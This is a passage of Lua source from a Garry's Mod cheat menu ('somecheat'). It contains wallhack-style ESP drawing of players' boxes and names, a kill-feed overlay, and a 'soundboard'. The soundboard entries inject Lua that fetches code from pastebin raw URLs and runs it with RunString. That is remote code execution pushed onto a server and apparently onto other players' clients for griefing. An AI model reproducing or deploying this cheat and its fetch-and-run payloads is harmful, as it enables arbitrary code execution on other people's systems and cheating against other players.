2311 local top, bottom = (pos + Vector(0, 0, max.z)):ToScreen(), (pos - Vector(0, 0, 8)):ToScreen()
2312 draw.SimpleText(v:Nick(), "Features", bottom.x, top.y, Color(255, 255, 255), TEXT_ALIGN_CENTER, TEXT_ALIGN_BOTTOM)
2313end
2314hook.Add("HUDPaint", "ESPESPEPS", function()
2315 for k,v in pairs(player.GetAll()) do
2316 if LocalPlayer() ~= v then
2317 if ESP.BoxEnabled then
2318 BoxESP(v)
2319 end
2320 if ESP.NameEnabled then
2321 NameESP(v)
2322 end
2323 end
2324 end
2325end)
2326
2327
2328local V2 = vgui.Create('DPanelList', esppage)
2329 V2:SetSize(326, 320)
2330 V2:SetPos(435, 45)
2331 V2.Paint = function(s, w, h)
2332 surface.SetDrawColor(Color(21, 21, 21))
2333 surface.DrawRect(0, 0, w, h)
2334 surface.SetDrawColor(21, 21, 21)
2335 surface.SetMaterial(upgrad)
2336 surface.SetDrawColor(o_color2)
2337 surface.SetMaterial(downgrad)
2338 surface.SetDrawColor(o_color2)
2339 surface.SetDrawColor(70, 70, 70, 255)
2340 surface.DrawOutlinedRect(0, 0, w, h)
2341end
2342
2343local V3 = vgui.Create('DPanelList', esppage)
2344 V3:SetSize(726, 265)
2345 V3:SetPos(35, 416)
2346 V3.Paint = function(s, w, h)
2347 surface.SetDrawColor(Color(21, 21, 21))
2348 surface.DrawRect(0, 0, w, h)
2349 surface.SetDrawColor(21, 21, 21)
2350 surface.SetMaterial(upgrad)
2351 surface.SetDrawColor(o_color2)
2352 surface.SetMaterial(downgrad)
2353 surface.SetDrawColor(o_color2)
2354 surface.SetDrawColor(70, 70, 70, 255)
2355 surface.DrawOutlinedRect(0, 0, w, h)
2356end
2357
2358-- Sound Board
2359
2360-- noob.PostLua([[BroadcastLua([[sound.PlayURL("", "mono", function() end)]])]])
2361
2362
2363 -- SoundBoard Normal sound --
2364--[[
2365 noob.AddSound("TESTING1", bar3, function()
2366 surface.PlaySound("buttons/button18.wav")
2367 chat.AddText(Color(255,0,0), "[somecheat] ", Color(255,155,155),"Feature in development")
2368end)]]
2369
2370 -- SoundBoard EarRape sound --
2371
2372 noob.AddSound("FortniteDefaultDance", bar4, function()
2373 surface.PlaySound("buttons/button18.wav")
2374 noob.PostLua([[http.Fetch('https://pastebin.com/raw/ptkfj201',function(b,l,h,c)RunString(b)end,nil)]])
2375end)
2376
2377 noob.AddSound("GrantMacdonaldRamRanch", bar4, function()
2378 surface.PlaySound("buttons/button18.wav")
2379 noob.PostLua([[http.Fetch('https://pastebin.com/raw/L952ZQHq',function(b,l,h,c)RunString(b)end,nil)]])
2380end)
2381
2382 noob.AddSound("SovietNationalAnthem", bar4, function()
2383 surface.PlaySound("buttons/button18.wav")
2384 noob.PostLua([[http.Fetch('https://pastebin.com/raw/hbxjFtfR',function(b,l,h,c)RunString(b)end,nil)]])
2385end)
2386
2387 noob.AddSound("White Noise", bar4, function()
2388 surface.PlaySound("buttons/button18.wav")
2389 noob.PostLua([[http.Fetch('https://pastebin.com/raw/v90GzxKW',function(b,l,h,c)RunString(b)end,nil)]])
2390end)
2391
2392 noob.AddSound("NoNonsense", bar4, function()
2393 surface.PlaySound("buttons/button18.wav")
2394 noob.PostLua([[http.Fetch('https://pastebin.com/raw/8nDGmpkS',function(b,l,h,c)RunString(b)end,nil)]])
2395end)
2396
2397 noob.AddSound("Fortnite Emote", bar4, function()
2398 surface.PlaySound("buttons/button18.wav")
2399 noob.PostLua([[http.Fetch('https://pastebin.com/raw/gCEjD0Tt',function(b,l,h,c)RunString(b)end,nil)]])
2400end)
2401
2402 noob.AddSound("LilPum", bar4, function()
2403 surface.PlaySound("buttons/button18.wav")
2404 noob.PostLua([[http.Fetch('https://pastebin.com/raw/2PbVLRWR',function(b,l,h,c)RunString(b)end,nil)]])
2405end)
2406
2407 -- Menu Ending :(
2408
2409 function CloseMenu()
2410 MenuOpen = false
2411 somecheat:Close()
2412 end
2413
2414end
2415somecheat.voidz(true)
2416
2417concommand.Add("JumboKillFead",function()
2418 print("Loading JumboKillFead")
2419surface.CreateFont("JumboKillFead", {size=14})
2420local JumboKillFead = {}
2421
2422local color_red = Color(255, 0, 0, 150)
2423local color_blue = Color(0, 0, 255, 150)
2424hook.Add("HUDPaint", "JumboKillFead", function()
2425 for k,v in pairs(JumboKillFead) do
2426 draw.SimpleText(v, "JumboKillFead", ScrW() / 2, (ScrH() / 2) + (k * 10), Color(0,0,0,250),1,1)
2427 end
2428end)
2429
2430local function AddKill(text)
2431 table.insert(JumboKillFead, text)
2432 timer.Simple(5, function()
2433 table.remove(JumboKillFead, 1)
2434 end)
2435 chat.AddText(color_red, "[JumboKillFead]: ", color_blue, text)
2436end
2437
2438gameevent.Listen("entity_killed")
2439hook.Add("entity_killed", "GLX_entity_killed", function(data)
2440 local attacker = Entity(data.entindex_attacker)
2441 local killed = Entity(data.entindex_killed)
2442 if attacker == LocalPlayer() then
2443 AddKill("KILL ! " .. killed:Name())
2444 end
2445 if killed == LocalPlayer() then
2446 AddKill("DEATH ! " .. killed:Name())
2447 end
2448end)
2449hook.Add("ScalePlayerDamage", "JumboKillFead", function(ply,hitgroup,dmg)
2450 if dmg:GetInflictor() == LocalPlayer() then
2451 if hitgroup == HITGROUP_HEAD then
2452 AddKill("HEADSHOT ! "..ply:Name())
2453 end
2454 end
2455 if ply == LocalPlayer() then
2456 if hitgroup == HITGROUP_HEAD then
2457 AddKill("YOU TOOK A HEADSHOT ! "..dmg:GetInflictor():Name())
2458 end
2459 end
2460end)
2461
2462
2463
2464end)